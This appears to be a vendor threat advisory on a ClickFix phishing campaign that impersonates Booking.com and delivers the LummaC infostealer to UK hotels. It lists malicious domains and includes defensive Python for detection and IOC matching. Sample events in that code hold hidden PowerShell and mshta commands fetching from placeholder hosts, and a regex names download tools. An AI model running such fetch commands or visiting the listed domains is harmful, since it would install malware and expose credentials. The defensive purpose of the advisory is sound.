Impersonating Booking.com

    24 February 2025

    Key Points

    What you'll learn in this notification

    • Targets the hospitality sector, predominantly in the UK
    • Operation employs the “Clickfix” technique to enhance its effectiveness
    • Malware associated with these campaigns has been identified as LummaC, a popular infostealer

    Mimecast Threat Researchers have observed a malware campaign using Sendinblue (now Brevo) for distribution. Brevo is an all-in-one marketing platform offering email, SMS, automation, and CRM tools for customer engagement. The campaign uses lures about booking issues to trick users into clicking links that appear to come from booking.com. Those links actually go through the Sendinblue/Brevo click-tracking redirect service, which records the click and then forwards the user to malicious sites controlled by the threat operation. With most users accessing personal websites on corporate devices, it is important to highlight how personal services are being used to target corporate devices.



    [Images: TI-notification-booking.com-01.webp, TI-notification-booking.com-02.webp]


    Once redirected, the user sees the CAPTCHA page below, which instructs them to copy a command to the clipboard and paste it into the command prompt as part of a supposed verification step.



    [Image: TI-notification-booking.com-03.webp]


    Once the user runs the command, an infostealer is downloaded. In this case the malware identified was LummaC, which typically targets credentials, browser data, and cryptocurrency wallets.
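The execution step just described (a command pasted into the Run dialog or a command prompt that pulls down the infostealer) leaves a process-creation trace that endpoint telemetry can score. The following is an added example for this notification, not Mimecast's detection logic: it models events on Sysmon Event ID 1 fields and flags a scripting interpreter started from explorer.exe or cmd.exe with a command line that fetches or decodes something. The event records are constructed and the hostnames in them are placeholders, not IOCs from the campaign.

```python
"""Heuristic for the ClickFix execution step: the victim pastes a command
into the Windows Run dialog or a console, so a scripting interpreter is
started by explorer.exe (or cmd.exe) with a command line that reaches
out to the network or decodes a payload.

Added example, not Mimecast's detection logic. Field names follow Sysmon
Event ID 1; all sample records below are constructed.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix command typically runs through (T1059.003).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# A process started from the Run dialog has explorer.exe as its parent;
# one started from a console window has cmd.exe as its parent.
PASTE_PARENTS = {"explorer.exe", "cmd.exe"}

# Command-line fragments that fetch or decode content (T1059.003, T1027).
SUSPICIOUS_ARGS = re.compile(
    r"https?://|\bcurl\b|\bwget\b|Invoke-WebRequest|\biwr\b|DownloadString|"
    r"FromBase64String|-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of its parent process
    command_line: str
    user: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_score(ev: ProcessEvent) -> int:
    """0 means not interesting; higher means more ClickFix-like."""
    if basename(ev.image) not in INTERPRETERS:
        return 0
    if basename(ev.parent_image) not in PASTE_PARENTS:
        return 0
    score = 1                                   # interpreter under a user shell
    if basename(ev.parent_image) == "explorer.exe":
        score += 1                              # Run dialog, not a script chain
    if SUSPICIOUS_ARGS.search(ev.command_line):
        score += 2                              # fetches or decodes a payload
    return score


def flag_events(events, threshold: int = 3):
    """Return (user, command_line) pairs scoring at or above the threshold."""
    return [(ev.user, ev.command_line) for ev in events
            if clickfix_score(ev) >= threshold]


# Constructed sample telemetry; hostnames are placeholders (.invalid TLD).
SAMPLE_EVENTS = [
    # Pasted into the Run dialog: mshta fetching remote content
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta https://verify.example.invalid/check", "HOTEL\\frontdesk"),
    # Pasted into a console window: hidden PowerShell download under cmd.exe
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe",
                 'powershell -w hidden -c "iwr https://verify.example.invalid/check"',
                 "HOTEL\\frontdesk"),
    # Benign: user opened a console from the Start menu
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                 "cmd.exe", "HOTEL\\frontdesk"),
    # Benign: scheduled script, parent is a service host rather than a user shell
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\svchost.exe",
                 r"powershell -File C:\Scripts\backup.ps1", "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for user, cmd in flag_events(SAMPLE_EVENTS):
        print(f"ClickFix candidate for {user}: {cmd}")
```

The threshold of 3 means a console started from Explorer alone (score 2) is not reported, while an interpreter under a user shell whose command line downloads or decodes content is. Where process telemetry is thin, the Run dialog's history under the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, a standard Windows location) is a useful secondary source for what was pasted.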

    This campaign, using Brevo as a distribution and redirection method, was first observed in early January at low volumes and picked up significantly in mid and late January. As the targets were hotels, hotel chains, resorts and similar businesses, this aligns with people booking their holidays for the forthcoming year early.



    [Image: TI-notification-booking.com-04.webp]

    Mimecast Protection

    We have identified several attributes in the campaigns which have been added to our detection capabilities.



    Targeting: UK, Hospitality sector



    IOCs:

    URLs
    admin-booking-service[.]com
    adminbokingcapha64578[.]com
    booking[.]parner-id-010101743[.]com
    commentsvisitor58100[.]world
    commentsvisitor589360[.]world
    concernguest68549[.]com
    concernguest74549[.]com
    feedbackguest485100[.]world
    feedbackguest485121[.]world
    feedbackguest48594821[.]world
    feedbackguest84560[.]world
    feedbackpage91293[.]world
    issueguest423239[.]world
    issueguest495139[.]world
    parner-id-010101743[.]com
    parner-id1501202500[.]com
    reportguest4893921[.]world
    reportguest4895921[.]world
    roomsattendes999923[.]world
    roomsvisitor9934224[.]world



    Tactics, Techniques and Procedures

    T1566.002: Phishing: Spearphishing Link
    T1585.002: Establish Accounts: Email Accounts
    T1204.002: User Execution: Malicious File
    T1059.003: Command and Scripting Interpreter: Windows Command Shell
    T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
    T1027: Obfuscated Files or Information
    T1202: Indirect Command Execution
    T1555: Credentials from Password Stores
    T1083: File and Directory Discovery
    T1518.001: Software Discovery: Security Software Discovery
    T1113: Screen Capture



    Recommendations

    • Ensure a URL Protect policy is set to protect the organization.
    • Search through your email receipt logs to determine if any of the file hashes have been delivered to your users.
    • Educate end users to avoid running commands in a command prompt.
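The IOC list above is defanged, and the recommendation to search receipt logs needs those indicators in a matchable form. The following is an added example for this notification, not Mimecast's tooling: it refangs the listed domains, extracts URLs from log lines, and reports a hit when the URL's host is one of the listed domains or a subdomain of one (the list itself contains booking[.]parner-id-010101743[.]com under parner-id-010101743[.]com). The domains are the ones listed in this notification; the log lines, addresses and paths are constructed.

```python
"""Match the defanged domain IOCs from this notification against URLs in
email-receipt or web-proxy log lines, treating subdomains as hits too.

Added example, not Mimecast's tooling. IOC domains are from the
notification; the sample log lines are constructed.
"""
import re
from urllib.parse import urlsplit

DEFANGED_IOCS = """
admin-booking-service[.]com
adminbokingcapha64578[.]com
booking[.]parner-id-010101743[.]com
commentsvisitor58100[.]world
commentsvisitor589360[.]world
concernguest68549[.]com
concernguest74549[.]com
feedbackguest485100[.]world
feedbackguest485121[.]world
feedbackguest48594821[.]world
feedbackguest84560[.]world
feedbackpage91293[.]world
issueguest423239[.]world
issueguest495139[.]world
parner-id-010101743[.]com
parner-id1501202500[.]com
reportguest4893921[.]world
reportguest4895921[.]world
roomsattendes999923[.]world
roomsvisitor9934224[.]world
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a matchable, lower-cased domain."""
    return indicator.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def defang(domain: str) -> str:
    """Defang a domain again for safe reporting."""
    return domain.replace(".", "[.]")


def load_iocs(text: str) -> set:
    """Parse one defanged indicator per line into a set of domains."""
    return {refang(line) for line in text.splitlines() if line.strip()}


def host_of(url: str) -> str:
    """Hostname of a URL or bare domain, lower-cased ('' if unparsable)."""
    value = url if "://" in url else "http://" + url
    return (urlsplit(value).hostname or "").lower()


def matching_ioc(host: str, iocs: set):
    """Return the listed domain that host equals or sits under, else None."""
    labels = host.split(".")
    for i in range(len(labels) - 1):       # stop before a bare TLD
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def scan_log(lines, iocs):
    """Return (line number, defanged IOC) for every URL that hits the list."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for url in URL_RE.findall(line):
            found = matching_ioc(host_of(url), iocs)
            if found:
                hits.append((lineno, defang(found)))
    return hits


# Constructed receipt-log lines; addresses and paths are placeholders.
SAMPLE_LOG = [
    '2025-01-21T09:14:02Z from=noreply@example.invalid to=frontdesk@hotel.example '
    'subject="Guest complaint #4821" url=https://www.feedbackguest84560.world/review/4821',
    '2025-01-21T09:20:11Z from=noreply@example.invalid to=frontdesk@hotel.example '
    'subject="Your reservations" url=https://www.booking.com/myreservations',
    '2025-01-22T11:02:45Z from=noreply@example.invalid to=reception@hotel.example '
    'subject="Verify your listing" url=http://booking.parner-id-010101743.com/verify',
]

if __name__ == "__main__":
    for lineno, ioc in scan_log(SAMPLE_LOG, load_iocs(DEFANGED_IOCS)):
        print(f"line {lineno}: matched {ioc}")
```

Because the emails carry Brevo click-tracking links rather than the final domains, the receipt log may only show the tracking URL; run the same matcher over web-proxy or DNS logs, which record the destination after the redirect.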
